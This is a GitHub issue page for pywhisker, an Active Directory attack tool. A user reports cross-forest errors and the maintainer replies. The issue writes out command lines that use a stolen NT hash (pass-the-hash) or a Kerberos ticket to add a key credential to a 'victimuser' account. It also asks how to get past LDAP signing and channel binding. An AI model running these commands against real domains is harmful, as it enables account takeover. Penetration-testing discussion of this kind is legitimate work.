Write msds-keycredentiallink with cross-forest ticket #14
Labels
help wanted
Extra attention is needed
Comments
|
I won't be able to add this for the time being (not enough time), but it would be really great if someone would implement the change. I would gladly review & merge, it would be an awesome addition in my opinion (if it doesn't break how the tool currently works of course). |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
When i need generate certificate from domainA.contoso.local to target victimuser in domainB.contoso.local. For authentication i use NT hash with this command:
python3 pywhisker.py -a add -d domainA.contoso.local -u admin -H :<nthash> -t victimuser -td domainB.contoso.localAll fine.
But in my case domainB ldap signing +channel binding is enabled, and i can't auth with ntlm, because i get error strongerAuthRequired.
And when i ask ticket for admin@domainA.contoso.local and then use command:
python3 pywhisker.py -a add -d domainA.contoso.local -u admin -k --dc-ip <dc ip domainB.contoso.local> -t victimuser -td domainB.contoso.localI get error KDC_ERR_WRONG_REALM
I know that this version of ldap3 can solve this problem https://github.com/ThePirateWhoSmellsOfSunflowers/ldap3/tree/tls_cb_and_seal_for_ntlm.
I tried to do it myself, but I couldn't succeed.
The text was updated successfully, but these errors were encountered: